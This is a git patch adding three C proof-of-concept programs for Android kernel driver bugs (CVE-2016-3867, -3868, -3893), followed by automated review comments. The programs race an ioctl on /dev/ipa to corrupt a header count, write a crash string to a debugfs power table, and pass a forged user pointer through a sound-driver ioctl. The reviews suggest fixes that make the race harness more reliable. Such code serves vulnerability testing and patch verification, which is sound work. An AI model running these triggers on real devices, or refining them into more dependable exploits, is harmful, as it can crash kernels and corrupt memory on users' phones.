From 6857da8b9f543a5ee403959b89fe2f6e85639041 Mon Sep 17 00:00:00 2001
From: Scott Bauer
Date: Fri, 9 Sep 2016 21:35:11 -0600
Subject: [PATCH] bugs for sept bulletin

Signed-off-by: Scott Bauer
---
 CVE-2016-3867.c | 118 ++++++++++++++++++++++++++++++++++++++++++++++++
 CVE-2016-3868.c | 22 +++++++++
 CVE-2016-3893.c | 58 ++++++++++++++++++++++++
 3 files changed, 198 insertions(+)
 create mode 100644 CVE-2016-3867.c
 create mode 100644 CVE-2016-3868.c
 create mode 100644 CVE-2016-3893.c

diff --git a/CVE-2016-3867.c b/CVE-2016-3867.c
new file mode 100644
index 0000000..646f2ca
--- /dev/null
+++ b/CVE-2016-3867.c
@@ -0,0 +1,118 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+static const char *dev = "/dev/ipa";
+
+#define IPA_RESOURCE_NAME_MAX 32
+#define IPA_HDR_MAX_SIZE 64
+#define IPA_IOCTL_ADD_HDR 0
+#define IPA_IOCTL_DEL_HDR 1
+
+enum ipa_hdr_l2_type {
+ IPA_HDR_L2_NONE,
+ IPA_HDR_L2_ETHERNET_II,
+ IPA_HDR_L2_802_3,
+ IPA_HDR_L2_MAX,
+};
+
+struct ipa_hdr_del {
+ uint32_t hdl;
+ int status;
+};
+
+struct ipa_ioc_del_hdr {
+ uint8_t commit;
+ uint8_t num_hdls;
+ struct ipa_hdr_del hdl[0];
+};
+
+
+struct ipa_hdr_add {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t hdr[IPA_HDR_MAX_SIZE];
+ uint8_t hdr_len;
+ enum ipa_hdr_l2_type type;
+ uint8_t is_partial;
+ uint32_t hdr_hdl;
+ int status;
+ uint8_t is_eth2_ofst_valid;
+ uint16_t eth2_ofst;
+};
+
+struct ipa_ioc_add_hdr {
+ uint8_t commit;
+ uint8_t num_hdrs;
+ struct ipa_hdr_add hdr[0];
+};
+
+#define IPA_IOC_MAGIC 0xCF
+
+
+#define IPA_IOC_ADD_HDR _IOWR(IPA_IOC_MAGIC, IPA_IOCTL_ADD_HDR,\
+ struct ipa_ioc_add_hdr *)
+
+
+#define IPA_IOC_DEL_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_HDR,\
+ struct ipa_ioc_del_hdr *)
+
+
+
+volatile int trigger = 0;
+volatile int trigger1 = 0;
+static void *size_change(void *hdr)
+{
+ struct ipa_ioc_add_hdr *add_hdr = hdr;
+ static unsigned int stupid_hack = 2000;
+
+ trigger1 = 1;
+ while (trigger == 0) { };
+ usleep(stupid_hack);
+ add_hdr->num_hdrs = 255;
+ stupid_hack++;
+ if (stupid_hack > 3000)
+ stupid_hack = 2000;
+
+ trigger1 = 0;
+ return NULL;
+}
+
+
+int main(void)
+{
+
+ int fd, counter;
+ pthread_t race_car;
+ struct ipa_ioc_add_hdr add_hdr = { 0 };
+
+ fd = open(dev, O_RDWR);
+ if (fd < 0) {
+ printf("Failed to open %s with %s\n", dev, strerror(errno));
+ return EXIT_FAILURE;
+ }
+
+ for (counter = 0; counter < 10000; counter++) {
+ pthread_create(&race_car, NULL, size_change, &add_hdr);
+ while(trigger1 != 1) {}
+ trigger = 1;
+ asm volatile("dmb ishst" : : : "memory");
+ ioctl(fd, IPA_IOC_ADD_HDR, &add_hdr);
+ pthread_join(race_car, NULL);
+ trigger = 0;
+ add_hdr.num_hdrs = 0;
+ }
+
+ return EXIT_FAILURE;
+}
diff --git a/CVE-2016-3868.c b/CVE-2016-3868.c
new file mode 100644
index 0000000..015021a
--- /dev/null
+++ b/CVE-2016-3868.c
@@ -0,0 +1,22 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+static const char *dev = "/sys/kernel/debug/msm_core/ptable";
+static const char *crasher = "1 1 1 1 4702111234474983745";
+int main(void)
+{
+ int fd;
+ fd = open(dev, O_WRONLY);
+ if (fd < 0) {
+ printf("Failed to open %s with %s\n", dev, strerror(errno));
+ return EXIT_FAILURE;
+ }
+ write(fd, crasher, strlen(crasher));
+}
diff --git a/CVE-2016-3893.c b/CVE-2016-3893.c
new file mode 100644
index 0000000..fc28193
--- /dev/null
+++ b/CVE-2016-3893.c
@@ -0,0 +1,58 @@
+/**
+ *
+ * CVE-2016-3893.c
+ * https://code.google.com/p/android/issues/detail?id=213554
+ *
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+enum wcd_cal_type {
+ WCD9XXX_MIN_CAL,
+ WCD9XXX_ANC_CAL = WCD9XXX_MIN_CAL,
+ WCD9XXX_MAD_CAL,
+ WCD9XXX_MBHC_CAL,
+ WCD9XXX_MAX_CAL,
+};
+
+
+struct wcdcal_ioctl_buffer {
+ __u32 size;
+ __u8 __user *buffer;
+ enum wcd_cal_type cal_type;
+};
+
+#define SNDRV_CTL_IOCTL_HWDEP_CAL_TYPE \
+ _IOW('U', 0x1, struct wcdcal_ioctl_buffer)
+
+
+int main(void)
+{
+ int i;
+ const char *dev = "/dev/snd/hwC0D1000";
+ int fd;
+ struct wcdcal_ioctl_buffer buf = { 0 };
+ buf.size = 0xF;
+ buf.buffer = 0x414100ABADACC355;
+ buf.cal_type = WCD9XXX_MAD_CAL;
+
+ printf("Opening %s\n", dev);
+ fd = open(dev, O_WRONLY);
+ if (fd > 0) {
+ printf("ioctl\n");
+ ioctl(fd, SNDRV_CTL_IOCTL_HWDEP_CAL_TYPE, &buf);
+ printf("strerror %s\n", strerror(errno));
+ }
+ else
+ printf("Error on %s with %s\n", dev, strerror(errno));
+
+ //sleep(1);
+ close(fd);
+}
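Review bot: `pthread_create(&race_car, NULL, size_change, &add_hdr);` in the loop of main() discards its return value, so if thread creation fails the following `while(trigger1 != 1) {}` spins forever and `pthread_join` is later called on an uninitialized handle; `if (pthread_create(&race_car, NULL, size_change, &add_hdr) != 0) break;` keeps the harness from hanging. The descriptor returned by `open(dev, O_RDWR)` is never closed before main returns. `trigger` and `trigger1` are plain `volatile int` flags used as cross-thread synchronization, which C11 does not guarantee; `_Atomic int` would state the intent and is what `<stdatomic.h>` exists for. The `asm volatile("dmb ishst" : : : "memory");` barrier is ARM-specific, so a comment noting that this file only builds for ARM/AArch64 targets would help anyone trying to compile it on another host.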
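Review bot: `write(fd, crasher, strlen(crasher));` at the end of main() in CVE-2016-3868.c ignores the return value, so a failed or short write is indistinguishable from success when the program exits; `if (write(fd, crasher, strlen(crasher)) < 0) printf("write failed: %s\n", strerror(errno));` would report it, and `close(fd);` is missing before the closing brace. main() also falls off the end without a return statement, which C99 treats as returning 0, so the open-failure path returns EXIT_FAILURE while the write path silently exits 0; an explicit `return EXIT_SUCCESS;` (or EXIT_FAILURE, to match the other files) makes the exit status consistent.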
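Review bot: `if (fd > 0) {` after `open(dev, O_WRONLY)` in CVE-2016-3893.c treats descriptor 0 as a failure, and on the error branch `close(fd);` is still reached with fd == -1; the check should be `if (fd >= 0) {` with `close(fd);` moved inside that branch. `buf.buffer = 0x414100ABADACC355;` assigns an integer constant to a pointer without a cast, which is a constraint violation that most compilers only warn about, and `int i;` is declared but never used. The `__user` qualifier on `buffer` is a kernel sparse annotation that, as far as I can tell, userspace headers do not define, so it is unclear how this file compiles without a local `#define __user`; a comment stating the expected build environment would help.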